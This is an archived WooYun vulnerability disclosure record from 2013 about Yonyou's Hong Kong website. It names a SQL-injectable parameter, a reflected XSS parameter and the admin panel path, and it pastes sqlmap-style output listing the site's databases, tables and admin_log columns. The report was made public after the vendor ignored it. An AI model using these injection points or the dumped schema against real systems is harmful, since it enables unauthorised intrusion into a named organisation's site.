乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-06-10: 细节已通知厂商并且等待厂商处理中 2013-06-15: 厂商已经主动忽略漏洞,细节向公众公开
主站哦,不是分站提交了好几个,也送点礼物呀
当然,这个主站不是大陆的主站,是用友软件香港的主站
http://www.yonyou.com.hk/new/enquiry.php?uid=1
存在sql注入附送一枚反射型XSS
http://www.yonyou.com.hk/story/index.php?id=XSSCODE
后台地址
http://www.yonyou.com.hk/new/admin/
available databases [2]:[*] db1007112_ufida[*] information_schema
Database: db1007112_ufida[30 tables]+-------------------------+| admin_log || adpic || banner || banner_2013 || banner_home_2013 || content_2013 || content_other_2013 || content_sub_2013 || down_file || downform || downform_2013 || download_2013 || downlog || downone || guestbook || info || menu || onepage || qikan || qksort || resources_download_2013 || resources_menu_2013 || sessions || sort || stats || support_2013 || tongji || userlog || users || video |+-------------------------+
Database: db1007112_ufidaTable: admin_log[8 columns]+------------+---------------------+| Column | Type |+------------+---------------------+| ip_address | varchar(15) || log_id | int(10) unsigned || log_info | varchar(255) || log_time | datetime || log_type | tinyint(3) || maintainer | varchar(32) || store_id | tinyint(3) || users_id | tinyint(3) unsigned |+------------+---------------------+
反射型XSS
过滤
危害等级:无影响厂商忽略
忽略时间:2013-06-15 22:39
暂无